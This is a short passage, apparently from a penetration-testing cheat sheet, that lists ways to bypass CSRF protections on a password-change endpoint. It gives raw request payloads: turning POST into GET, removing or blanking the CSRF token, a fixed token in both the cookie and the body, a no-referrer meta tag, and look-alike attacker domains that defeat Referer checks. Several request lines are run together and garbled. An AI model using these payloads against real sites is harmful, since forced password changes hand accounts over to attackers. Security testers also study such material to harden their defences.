Additional CSRF Protection Bypasses
🔑 Techniques for Bypassing CSRF Protections
CSRF-Token:
POST /change_password POST body: new_password=pwned&confirm_new=pwnedGET /change_password?new_password=pwned&confirm_new=pwned
POST /change_password POST body: new_password=qwertyPOST /change_password POST body: new_password=qwerty&csrf_token=
POST /change_password Cookie: CSRF-Token=fixed_token; POST body: new_password=pwned&CSRF-Token=fixed_token
<meta name="referrer" content="no-referrer">
www.google.com.pwned.m3www.target.com.pwned.m3
Last updated